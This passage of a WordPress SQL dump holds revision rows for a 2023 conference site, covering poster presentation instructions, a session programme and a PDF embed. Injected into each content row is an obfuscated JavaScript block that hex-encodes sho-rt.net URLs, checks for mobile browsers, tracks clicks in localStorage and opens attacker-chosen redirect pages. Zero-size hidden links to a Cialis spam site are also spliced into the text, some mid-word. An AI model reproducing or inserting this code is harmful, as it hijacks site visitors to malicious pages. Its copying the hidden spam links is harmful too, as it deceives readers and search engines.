Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Programme','','inherit','closed','closed','','5122-revision-v1','','','2023-08-18 08:27:39','2023-08-18 08:27:39','',5122,'https://gsw2023.com/?p=5328',0,'revision','',0),
(5329,0,'2023-08-18 08:27:39','2023-08-18 08:27:39','<span style=\"font-size: 12pt;\"><strong>Poster Design and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span> Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on arrival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 5:00 PM . Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Program <a href=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.pdf\"><span style=\"color: #0000ff;\"><strong>Here</strong></span></a>\r\nPlease remove your poster after 5:00 PM.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Instructions for poster presentations','','inherit','closed','closed','','5132-revision-v1','','','2023-08-18 08:27:39','2023-08-18 08:27:39','',5132,'https://gsw2023.com/?p=5329',0,'revision','',0),
(5330,0,'2023-08-18 10:45:58','2023-08-18 10:45:58','<span style=\"font-size: 12pt;\"><strong>Poster Design and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span> Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on ar<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>rival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 5:00 PM . Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Program <a href=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.pdf\"><span style=\"color: #0000ff;\"><strong>Here</strong></span></a>\r\nPlease remove your poster after 5:00 PM.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Instructions for poster presentations','','inherit','closed','closed','','5132-revision-v1','','','2023-08-18 10:45:58','2023-08-18 10:45:58','',5132,'https://gsw2023.com/?p=5330',0,'revision','',0),
(5331,0,'2023-08-18 10:45:58','2023-08-18 10:45:58','<p style=\"text-align: center;\">[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/08/G<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span><span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>SW2023-Program-2023-08-13.doc.pdf\"]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 